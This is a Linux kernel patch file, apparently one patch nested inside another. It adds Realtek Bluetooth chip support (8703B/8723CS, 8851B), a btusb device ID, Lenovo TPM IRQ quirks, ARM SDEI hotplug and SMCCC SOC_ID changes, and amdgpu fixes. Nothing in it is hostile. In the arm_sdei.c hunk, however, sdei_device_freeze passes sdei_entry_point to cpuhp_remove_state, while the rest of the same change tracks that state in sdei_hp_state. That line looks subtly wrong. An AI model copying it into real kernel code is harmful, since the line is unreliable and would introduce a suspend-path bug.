++	/* 8851B */
++	{ IC_INFO(RTL_ROM_LMP_8851B, 0xb, 0xc, HCI_USB),
++	  .config_needed = false,
++	  .has_rom_version = true,
++	  .has_msft_ext = false,
++	  .fw_name  = "rtl_bt/rtl8851bu_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8851bu_config" },
+ 	};
+ 
+ static const struct id_table *btrtl_match_ic(u16 lmp_subver, u16 hci_rev,
+-					     u8 hci_ver, u8 hci_bus)
++					     u8 hci_ver, u8 hci_bus,
++					     u8 chip_type)
+ {
+ 	int i;
+ 
+@@ -225,6 +275,9 @@ static const struct id_table *btrtl_match_ic(u16 lmp_subver, u16 hci_rev,
+ 		if ((ic_id_table[i].match_flags & IC_MATCH_FL_HCIBUS) &&
+ 		    (ic_id_table[i].hci_bus != hci_bus))
+ 			continue;
++		if ((ic_id_table[i].match_flags & IC_MATCH_FL_CHIP_TYPE) &&
++		    (ic_id_table[i].chip_type != chip_type))
++			continue;
+ 
+ 		break;
+ 	}
+@@ -307,6 +360,7 @@ static int rtlbt_parse_firmware(struct hci_dev *hdev,
+ 		{ RTL_ROM_LMP_8723B, 1 },
+ 		{ RTL_ROM_LMP_8821A, 2 },
+ 		{ RTL_ROM_LMP_8761A, 3 },
++		{ RTL_ROM_LMP_8703B, 7 },
+ 		{ RTL_ROM_LMP_8822B, 8 },
+ 		{ RTL_ROM_LMP_8723B, 9 },	/* 8723D */
+ 		{ RTL_ROM_LMP_8821A, 10 },	/* 8821C */
+@@ -315,6 +369,7 @@ static int rtlbt_parse_firmware(struct hci_dev *hdev,
+ 		{ RTL_ROM_LMP_8852A, 18 },	/* 8852A */
+ 		{ RTL_ROM_LMP_8852A, 20 },	/* 8852B */
+ 		{ RTL_ROM_LMP_8852A, 25 },	/* 8852C */
++		{ RTL_ROM_LMP_8851B, 36 },	/* 8851B */
+ 	};
+ 
+ 	min_size = sizeof(struct rtl_epatch_header) + sizeof(extension_sig) + 3;
+@@ -587,6 +642,48 @@ out:
+ 	return ret;
+ }
+ 
++static bool rtl_has_chip_type(u16 lmp_subver)
++{
++	switch (lmp_subver) {
++	case RTL_ROM_LMP_8703B:
++		return true;
++	default:
++		break;
++	}
++
++	return  false;
++}
++
++static int rtl_read_chip_type(struct hci_dev *hdev, u8 *type)
++{
++	struct rtl_chip_type_evt *chip_type;
++	struct sk_buff *skb;
++	const unsigned char cmd_buf[] = {0x00, 0x94, 0xa0, 0x00, 0xb0};
++
++	/* Read RTL chip type command */
++	skb = __hci_cmd_sync(hdev, 0xfc61, 5, cmd_buf, HCI_INIT_TIMEOUT);
++	if (IS_ERR(skb)) {
++		rtl_dev_err(hdev, "Read chip type failed (%ld)",
++			    PTR_ERR(skb));
++		return PTR_ERR(skb);
++	}
++
++	chip_type = skb_pull_data(skb, sizeof(*chip_type));
++	if (!chip_type) {
++		rtl_dev_err(hdev, "RTL chip type event length mismatch");
++		kfree_skb(skb);
++		return -EIO;
++	}
++
++	rtl_dev_info(hdev, "chip_type status=%x type=%x",
++		     chip_type->status, chip_type->type);
++
++	*type = chip_type->type & 0x0f;
++
++	kfree_skb(skb);
++	return 0;
++}
++
+ void btrtl_free(struct btrtl_device_info *btrtl_dev)
+ {
+ 	kvfree(btrtl_dev->fw_data);
+@@ -603,7 +700,7 @@ struct btrtl_device_info *btrtl_initialize(struct hci_dev *hdev,
+ 	struct hci_rp_read_local_version *resp;
+ 	char cfg_name[40];
+ 	u16 hci_rev, lmp_subver;
+-	u8 hci_ver;
++	u8 hci_ver, chip_type = 0;
+ 	int ret;
+ 	u16 opcode;
+ 	u8 cmd[2];
+@@ -629,8 +726,14 @@ struct btrtl_device_info *btrtl_initialize(struct hci_dev *hdev,
+ 	hci_rev = le16_to_cpu(resp->hci_rev);
+ 	lmp_subver = le16_to_cpu(resp->lmp_subver);
+ 
++	if (rtl_has_chip_type(lmp_subver)) {
++		ret = rtl_read_chip_type(hdev, &chip_type);
++		if (ret)
++			goto err_free;
++	}
++
+ 	btrtl_dev->ic_info = btrtl_match_ic(lmp_subver, hci_rev, hci_ver,
+-					    hdev->bus);
++					    hdev->bus, chip_type);
+ 
+ 	if (!btrtl_dev->ic_info)
+ 		btrtl_dev->drop_fw = true;
+@@ -673,7 +776,7 @@ struct btrtl_device_info *btrtl_initialize(struct hci_dev *hdev,
+ 		lmp_subver = le16_to_cpu(resp->lmp_subver);
+ 
+ 		btrtl_dev->ic_info = btrtl_match_ic(lmp_subver, hci_rev, hci_ver,
+-						    hdev->bus);
++						    hdev->bus, chip_type);
+ 	}
+ out_free:
+ 	kfree_skb(skb);
+@@ -755,6 +858,8 @@ int btrtl_download_firmware(struct hci_dev *hdev,
+ 	case RTL_ROM_LMP_8761A:
+ 	case RTL_ROM_LMP_8822B:
+ 	case RTL_ROM_LMP_8852A:
++	case RTL_ROM_LMP_8703B:
++	case RTL_ROM_LMP_8851B:
+ 		return btrtl_setup_rtl8723b(hdev, btrtl_dev);
+ 	default:
+ 		rtl_dev_info(hdev, "assuming no firmware upload needed");
+@@ -779,6 +884,7 @@ void btrtl_set_quirks(struct hci_dev *hdev, struct btrtl_device_info *btrtl_dev)
+ 	case CHIP_ID_8852A:
+ 	case CHIP_ID_8852B:
+ 	case CHIP_ID_8852C:
++	case CHIP_ID_8851B:
+ 		set_bit(HCI_QUIRK_VALID_LE_STATES, &hdev->quirks);
+ 		set_bit(HCI_QUIRK_WIDEBAND_SPEECH_SUPPORTED, &hdev->quirks);
+ 		hci_set_aosp_capable(hdev);
+@@ -788,6 +894,22 @@ void btrtl_set_quirks(struct hci_dev *hdev, struct btrtl_device_info *btrtl_dev)
+ 		rtl_dev_dbg(hdev, "WBS supported not enabled.");
+ 		break;
+ 	}
++
++	if (!btrtl_dev->ic_info)
++		return;
++
++	switch (btrtl_dev->ic_info->lmp_subver) {
++	case RTL_ROM_LMP_8703B:
++		/* 8723CS reports two pages for local ext features,
++		 * but it doesn't support any features from page 2 -
++		 * it either responds with garbage or with error status
++		 */
++		set_bit(HCI_QUIRK_BROKEN_LOCAL_EXT_FEATURES_PAGE_2,
++			&hdev->quirks);
++		break;
++	default:
++		break;
++	}
+ }
+ EXPORT_SYMBOL_GPL(btrtl_set_quirks);
+ 
+@@ -946,6 +1068,12 @@ MODULE_FIRMWARE("rtl_bt/rtl8723b_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723b_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723bs_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723bs_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_cg_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_cg_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8761a_fw.bin");
+@@ -960,3 +1088,5 @@ MODULE_FIRMWARE("rtl_bt/rtl8852bu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_config.bin");
+diff --git a/drivers/bluetooth/btrtl.h b/drivers/bluetooth/btrtl.h
+index 2c441bda390a0..1c6282241d2d2 100644
+--- a/drivers/bluetooth/btrtl.h
++++ b/drivers/bluetooth/btrtl.h
+@@ -14,6 +14,11 @@
+ 
+ struct btrtl_device_info;
+ 
++struct rtl_chip_type_evt {
++	__u8 status;
++	__u8 type;
++} __packed;
++
+ struct rtl_download_cmd {
+ 	__u8 index;
+ 	__u8 data[RTL_FRAG_LEN];
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 90b85dcb138df..faad19b396d50 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -549,6 +549,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x043e, 0x310c), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3801), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 
+ 	/* Additional MediaTek MT7668 Bluetooth devices */
+ 	{ USB_DEVICE(0x043e, 0x3109), .driver_info = BTUSB_MEDIATEK |
+@@ -4016,6 +4019,9 @@ static int btusb_probe(struct usb_interface *intf,
+ 	if (id->driver_info & BTUSB_ACTIONS_SEMI) {
+ 		/* Support is advertised, but not implemented */
+ 		set_bit(HCI_QUIRK_BROKEN_ERR_DATA_REPORTING, &hdev->quirks);
++		set_bit(HCI_QUIRK_BROKEN_READ_TRANSMIT_POWER, &hdev->quirks);
++		set_bit(HCI_QUIRK_BROKEN_SET_RPA_TIMEOUT, &hdev->quirks);
++		set_bit(HCI_QUIRK_BROKEN_EXT_SCAN, &hdev->quirks);
+ 	}
+ 
+ 	if (!reset)
+diff --git a/drivers/bluetooth/hci_h5.c b/drivers/bluetooth/hci_h5.c
+index 6455bc4fb5bb3..e90670955df2c 100644
+--- a/drivers/bluetooth/hci_h5.c
++++ b/drivers/bluetooth/hci_h5.c
+@@ -936,6 +936,8 @@ static int h5_btrtl_setup(struct h5 *h5)
+ 	err = btrtl_download_firmware(h5->hu->hdev, btrtl_dev);
+ 	/* Give the device some time before the hci-core sends it a reset */
+ 	usleep_range(10000, 20000);
++	if (err)
++		goto out_free;
+ 
+ 	btrtl_set_quirks(h5->hu->hdev, btrtl_dev);
+ 
+@@ -1100,6 +1102,8 @@ static const struct of_device_id rtl_bluetooth_of_match[] = {
+ 	  .data = (const void *)&h5_data_rtl8822cs },
+ 	{ .compatible = "realtek,rtl8723bs-bt",
+ 	  .data = (const void *)&h5_data_rtl8723bs },
++	{ .compatible = "realtek,rtl8723cs-bt",
++	  .data = (const void *)&h5_data_rtl8723bs },
+ 	{ .compatible = "realtek,rtl8723ds-bt",
+ 	  .data = (const void *)&h5_data_rtl8723bs },
+ #endif
+diff --git a/drivers/char/tpm/tpm_tis.c b/drivers/char/tpm/tpm_tis.c
+index ed5dabd3c72d6..4be19d8f3ca95 100644
+--- a/drivers/char/tpm/tpm_tis.c
++++ b/drivers/char/tpm/tpm_tis.c
+@@ -83,6 +83,22 @@ static const struct dmi_system_id tpm_tis_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad T490s"),
+ 		},
+ 	},
++	{
++		.callback = tpm_tis_disable_irq,
++		.ident = "ThinkStation P360 Tiny",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkStation P360 Tiny"),
++		},
++	},
++	{
++		.callback = tpm_tis_disable_irq,
++		.ident = "ThinkPad L490",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad L490"),
++		},
++	},
+ 	{}
+ };
+ 
+diff --git a/drivers/firmware/arm_sdei.c b/drivers/firmware/arm_sdei.c
+index 1e1a51510e83b..f9040bd610812 100644
+--- a/drivers/firmware/arm_sdei.c
++++ b/drivers/firmware/arm_sdei.c
+@@ -43,6 +43,8 @@ static asmlinkage void (*sdei_firmware_call)(unsigned long function_id,
+ /* entry point from firmware to arch asm code */
+ static unsigned long sdei_entry_point;
+ 
++static int sdei_hp_state;
++
+ struct sdei_event {
+ 	/* These three are protected by the sdei_list_lock */
+ 	struct list_head	list;
+@@ -301,8 +303,6 @@ int sdei_mask_local_cpu(void)
+ {
+ 	int err;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = invoke_sdei_fn(SDEI_1_0_FN_SDEI_PE_MASK, 0, 0, 0, 0, 0, NULL);
+ 	if (err && err != -EIO) {
+ 		pr_warn_once("failed to mask CPU[%u]: %d\n",
+@@ -315,6 +315,7 @@ int sdei_mask_local_cpu(void)
+ 
+ static void _ipi_mask_cpu(void *ignored)
+ {
++	WARN_ON_ONCE(preemptible());
+ 	sdei_mask_local_cpu();
+ }
+ 
+@@ -322,8 +323,6 @@ int sdei_unmask_local_cpu(void)
+ {
+ 	int err;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = invoke_sdei_fn(SDEI_1_0_FN_SDEI_PE_UNMASK, 0, 0, 0, 0, 0, NULL);
+ 	if (err && err != -EIO) {
+ 		pr_warn_once("failed to unmask CPU[%u]: %d\n",
+@@ -336,6 +335,7 @@ int sdei_unmask_local_cpu(void)
+ 
+ static void _ipi_unmask_cpu(void *ignored)
+ {
++	WARN_ON_ONCE(preemptible());
+ 	sdei_unmask_local_cpu();
+ }
+ 
+@@ -343,6 +343,8 @@ static void _ipi_private_reset(void *ignored)
+ {
+ 	int err;
+ 
++	WARN_ON_ONCE(preemptible());
++
+ 	err = invoke_sdei_fn(SDEI_1_0_FN_SDEI_PRIVATE_RESET, 0, 0, 0, 0, 0,
+ 			     NULL);
+ 	if (err && err != -EIO)
+@@ -389,8 +391,6 @@ static void _local_event_enable(void *data)
+ 	int err;
+ 	struct sdei_crosscall_args *arg = data;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = sdei_api_event_enable(arg->event->event_num);
+ 
+ 	sdei_cross_call_return(arg, err);
+@@ -479,8 +479,6 @@ static void _local_event_unregister(void *data)
+ 	int err;
+ 	struct sdei_crosscall_args *arg = data;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = sdei_api_event_unregister(arg->event->event_num);
+ 
+ 	sdei_cross_call_return(arg, err);
+@@ -561,8 +559,6 @@ static void _local_event_register(void *data)
+ 	struct sdei_registered_event *reg;
+ 	struct sdei_crosscall_args *arg = data;
+ 
+-	WARN_ON(preemptible());
+-
+ 	reg = per_cpu_ptr(arg->event->private_registered, smp_processor_id());
+ 	err = sdei_api_event_register(arg->event->event_num, sdei_entry_point,
+ 				      reg, 0, 0);
+@@ -717,6 +713,8 @@ static int sdei_pm_notifier(struct notifier_block *nb, unsigned long action,
+ {
+ 	int rv;
+ 
++	WARN_ON_ONCE(preemptible());
++
+ 	switch (action) {
+ 	case CPU_PM_ENTER:
+ 		rv = sdei_mask_local_cpu();
+@@ -765,7 +763,7 @@ static int sdei_device_freeze(struct device *dev)
+ 	int err;
+ 
+ 	/* unregister private events */
+-	cpuhp_remove_state(CPUHP_AP_ARM_SDEI_STARTING);
++	cpuhp_remove_state(sdei_entry_point);
+ 
+ 	err = sdei_unregister_shared();
+ 	if (err)
+@@ -786,12 +784,15 @@ static int sdei_device_thaw(struct device *dev)
+ 		return err;
+ 	}
+ 
+-	err = cpuhp_setup_state(CPUHP_AP_ARM_SDEI_STARTING, "SDEI",
++	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "SDEI",
+ 				&sdei_cpuhp_up, &sdei_cpuhp_down);
+-	if (err)
++	if (err < 0) {
+ 		pr_warn("Failed to re-register CPU hotplug notifier...\n");
++		return err;
++	}
+ 
+-	return err;
++	sdei_hp_state = err;
++	return 0;
+ }
+ 
+ static int sdei_device_restore(struct device *dev)
+@@ -823,7 +824,7 @@ static int sdei_reboot_notifier(struct notifier_block *nb, unsigned long action,
+ 	 * We are going to reset the interface, after this there is no point
+ 	 * doing work when we take CPUs offline.
+ 	 */
+-	cpuhp_remove_state(CPUHP_AP_ARM_SDEI_STARTING);
++	cpuhp_remove_state(sdei_hp_state);
+ 
+ 	sdei_platform_reset();
+ 
+@@ -1003,13 +1004,15 @@ static int sdei_probe(struct platform_device *pdev)
+ 		goto remove_cpupm;
+ 	}
+ 
+-	err = cpuhp_setup_state(CPUHP_AP_ARM_SDEI_STARTING, "SDEI",
++	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "SDEI",
+ 				&sdei_cpuhp_up, &sdei_cpuhp_down);
+-	if (err) {
++	if (err < 0) {
+ 		pr_warn("Failed to register CPU hotplug notifier...\n");
+ 		goto remove_reboot;
+ 	}
+ 
++	sdei_hp_state = err;
++
+ 	return 0;
+ 
+ remove_reboot:
+diff --git a/drivers/firmware/smccc/smccc.c b/drivers/firmware/smccc/smccc.c
+index 60ccf3e90d7de..db818f9dcb8ee 100644
+--- a/drivers/firmware/smccc/smccc.c
++++ b/drivers/firmware/smccc/smccc.c
+@@ -17,9 +17,13 @@ static enum arm_smccc_conduit smccc_conduit = SMCCC_CONDUIT_NONE;
+ 
+ bool __ro_after_init smccc_trng_available = false;
+ u64 __ro_after_init smccc_has_sve_hint = false;
++s32 __ro_after_init smccc_soc_id_version = SMCCC_RET_NOT_SUPPORTED;
++s32 __ro_after_init smccc_soc_id_revision = SMCCC_RET_NOT_SUPPORTED;
+ 
+ void __init arm_smccc_version_init(u32 version, enum arm_smccc_conduit conduit)
+ {
++	struct arm_smccc_res res;
++
+ 	smccc_version = version;
+ 	smccc_conduit = conduit;
+ 
+@@ -27,6 +31,18 @@ void __init arm_smccc_version_init(u32 version, enum arm_smccc_conduit conduit)
+ 	if (IS_ENABLED(CONFIG_ARM64_SVE) &&
+ 	    smccc_version >= ARM_SMCCC_VERSION_1_3)
+ 		smccc_has_sve_hint = true;
++
++	if ((smccc_version >= ARM_SMCCC_VERSION_1_2) &&
++	    (smccc_conduit != SMCCC_CONDUIT_NONE)) {
++		arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_FEATURES_FUNC_ID,
++				     ARM_SMCCC_ARCH_SOC_ID, &res);
++		if ((s32)res.a0 >= 0) {
++			arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 0, &res);
++			smccc_soc_id_version = (s32)res.a0;
++			arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 1, &res);
++			smccc_soc_id_revision = (s32)res.a0;
++		}
++	}
+ }
+ 
+ enum arm_smccc_conduit arm_smccc_1_1_get_conduit(void)
+@@ -44,6 +60,16 @@ u32 arm_smccc_get_version(void)
+ }
+ EXPORT_SYMBOL_GPL(arm_smccc_get_version);
+ 
++s32 arm_smccc_get_soc_id_version(void)
++{
++	return smccc_soc_id_version;
++}
++
++s32 arm_smccc_get_soc_id_revision(void)
++{
++	return smccc_soc_id_revision;
++}
++
+ static int __init smccc_devices_init(void)
+ {
+ 	struct platform_device *pdev;
+diff --git a/drivers/firmware/smccc/soc_id.c b/drivers/firmware/smccc/soc_id.c
+index dd7c3d5e8b0bb..890eb454599a3 100644
+--- a/drivers/firmware/smccc/soc_id.c
++++ b/drivers/firmware/smccc/soc_id.c
+@@ -42,41 +42,23 @@ static int __init smccc_soc_init(void)
+ 	if (arm_smccc_get_version() < ARM_SMCCC_VERSION_1_2)
+ 		return 0;
+ 
+-	if (arm_smccc_1_1_get_conduit() == SMCCC_CONDUIT_NONE) {
+-		pr_err("%s: invalid SMCCC conduit\n", __func__);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_FEATURES_FUNC_ID,
+-			     ARM_SMCCC_ARCH_SOC_ID, &res);
+-
+-	if ((int)res.a0 == SMCCC_RET_NOT_SUPPORTED) {
++	soc_id_version = arm_smccc_get_soc_id_version();
++	if (soc_id_version == SMCCC_RET_NOT_SUPPORTED) {
+ 		pr_info("ARCH_SOC_ID not implemented, skipping ....\n");
+ 		return 0;
+ 	}
+ 
+-	if ((int)res.a0 < 0) {
+-		pr_info("ARCH_FEATURES(ARCH_SOC_ID) returned error: %lx\n",
+-			res.a0);
+-		return -EINVAL;
+-	}
+-
+-	arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 0, &res);
+-	if ((int)res.a0 < 0) {
++	if (soc_id_version < 0) {
+ 		pr_err("ARCH_SOC_ID(0) returned error: %lx\n", res.a0);
+ 		return -EINVAL;
+ 	}
+ 
+-	soc_id_version = res.a0;
+-
+-	arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 1, &res);
+-	if ((int)res.a0 < 0) {
++	soc_id_rev = arm_smccc_get_soc_id_revision();
++	if (soc_id_rev < 0) {
+ 		pr_err("ARCH_SOC_ID(1) returned error: %lx\n", res.a0);
+ 		return -EINVAL;
+ 	}
+ 
+-	soc_id_rev = res.a0;
+-
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+ 	if (!soc_dev_attr)
+ 		return -ENOMEM;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 3380daf42da8a..b803e785d3aff 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -683,9 +683,11 @@ int amdgpu_gfx_ras_late_init(struct amdgpu_device *adev, struct ras_common_if *r
+ 		if (r)
+ 			return r;
+ 
+-		r = amdgpu_irq_get(adev, &adev->gfx.cp_ecc_error_irq, 0);
+-		if (r)
+-			goto late_fini;
++		if (adev->gfx.cp_ecc_error_irq.funcs) {
++			r = amdgpu_irq_get(adev, &adev->gfx.cp_ecc_error_irq, 0);
++			if (r)
++				goto late_fini;
++		}
+ 	} else {
+ 		amdgpu_ras_feature_enable_on_boot(adev, ras_block, 0);
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 82e27bd4f0383..7e8b7171068dc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -1432,13 +1432,31 @@ int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe)
+ 	struct amdgpu_firmware_info *info;
+ 	char ucode_prefix[30];
+ 	char fw_name[40];
++	bool need_retry = false;
+ 	int r;
+ 
+-	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
+-	snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
+-		ucode_prefix,
+-		pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix,
++				       sizeof(ucode_prefix));
++	if (adev->ip_versions[GC_HWIP][0] >= IP_VERSION(11, 0, 0)) {
++		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++			 ucode_prefix,
++			 pipe == AMDGPU_MES_SCHED_PIPE ? "_2" : "1");
++		need_retry = true;
++	} else {
++		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++			 ucode_prefix,
++			 pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	}
++
+ 	r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
++	if (r && need_retry && pipe == AMDGPU_MES_SCHED_PIPE) {
++		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
++			 ucode_prefix);
++		DRM_INFO("try to fall back to %s\n", fw_name);
++		r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe],
++					 fw_name);
++	}
++
+ 	if (r)
+ 		goto out;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+index af94ac580d3e1..2127aab74a68f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+@@ -8236,8 +8236,14 @@ static int gfx_v10_0_set_powergating_state(void *handle,
+ 	case IP_VERSION(10, 3, 3):
+ 	case IP_VERSION(10, 3, 6):
+ 	case IP_VERSION(10, 3, 7):
++		if (!enable)
++			amdgpu_gfx_off_ctrl(adev, false);
++
+ 		gfx_v10_cntl_pg(adev, enable);
+-		amdgpu_gfx_off_ctrl(adev, enable);
++
++		if (enable)
++			amdgpu_gfx_off_ctrl(adev, true);
++
+ 		break;
+ 	default:
+ 		break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 0dd2fe4f071e8..bc65fc1350f9a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -4641,13 +4641,29 @@ static int gfx_v11_0_post_soft_reset(void *handle)
+ static uint64_t gfx_v11_0_get_gpu_clock_counter(struct amdgpu_device *adev)
+ {
+ 	uint64_t clock;
++	uint64_t clock_counter_lo, clock_counter_hi_pre, clock_counter_hi_after;
++
++	if (amdgpu_sriov_vf(adev)) {
++		amdgpu_gfx_off_ctrl(adev, false);
++		mutex_lock(&adev->gfx.gpu_clock_mutex);
++		clock_counter_hi_pre = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_HI);
++		clock_counter_lo = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_LO);
++		clock_counter_hi_after = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_HI);
++		if (clock_counter_hi_pre != clock_counter_hi_after)
++			clock_counter_lo = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_LO);
++		mutex_unlock(&adev->gfx.gpu_clock_mutex);
++		amdgpu_gfx_off_ctrl(adev, true);
++	} else {
++		preempt_disable();
++		clock_counter_hi_pre = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_UPPER);
++		clock_counter_lo = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_LOWER);
++		clock_counter_hi_after = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_UPPER);
++		if (clock_counter_hi_pre != clock_counter_hi_after)
++			clock_counter_lo = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_LOWER);
++		preempt_enable();
++	}
++	clock = clock_counter_lo | (clock_counter_hi_after << 32ULL);
+ 
+-	amdgpu_gfx_off_ctrl(adev, false);
+-	mutex_lock(&adev->gfx.gpu_clock_mutex);
+-	clock = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_LOWER) |
+-		((uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_UPPER) << 32ULL);
+-	mutex_unlock(&adev->gfx.gpu_clock_mutex);
+-	amdgpu_gfx_off_ctrl(adev, true);
+ 	return clock;
+ }
+ 
+@@ -5085,8 +5101,14 @@ static int gfx_v11_0_set_powergating_state(void *handle,
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 4):
++		if (!enable)
++			amdgpu_gfx_off_ctrl(adev, false);
++
+ 		gfx_v11_cntl_pg(adev, enable);
+-		amdgpu_gfx_off_ctrl(adev, enable);
++
++		if (enable)
++			amdgpu_gfx_off_ctrl(adev, true);
++
+ 		break;
+ 	default:
+ 		break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 2d11e8e7e1235..7124347d2b6c4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -31,6 +31,8 @@
+ #include "umc_v8_10.h"
+ #include "athub/athub_3_0_0_sh_mask.h"
+ #include "athub/athub_3_0_0_offset.h"
++#include "dcn/dcn_3_2_0_offset.h"
++#include "dcn/dcn_3_2_0_sh_mask.h"
+ #include "oss/osssys_6_0_0_offset.h"
+ #include "ivsrcid/vmc/irqsrcs_vmc_1_0.h"
+ #include "navi10_enum.h"
+@@ -523,7 +525,24 @@ static void gmc_v11_0_get_vm_pte(struct amdgpu_device *adev,
+ 
+ static unsigned gmc_v11_0_get_vbios_fb_size(struct amdgpu_device *adev)
+ {
+-	return 0;
++	u32 d1vga_control = RREG32_SOC15(DCE, 0, regD1VGA_CONTROL);
++	unsigned size;
++
++	if (REG_GET_FIELD(d1vga_control, D1VGA_CONTROL, D1VGA_MODE_ENABLE)) {
++		size = AMDGPU_VBIOS_VGA_ALLOCATION;
++	} else {
++		u32 viewport;
++		u32 pitch;
++
++		viewport = RREG32_SOC15(DCE, 0, regHUBP0_DCSURF_PRI_VIEWPORT_DIMENSION);
++		pitch = RREG32_SOC15(DCE, 0, regHUBPREQ0_DCSURF_SURFACE_PITCH);
++		size = (REG_GET_FIELD(viewport,
++					HUBP0_DCSURF_PRI_VIEWPORT_DIMENSION, PRI_VIEWPORT_HEIGHT) *
++				REG_GET_FIELD(pitch, HUBPREQ0_DCSURF_SURFACE_PITCH, PITCH) *
++				4);
++	}
++
++	return size;
+ }
+ 
+ static const struct amdgpu_gmc_funcs gmc_v11_0_gmc_funcs = {
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index e3168149ca8f6..08766b6784361 100644
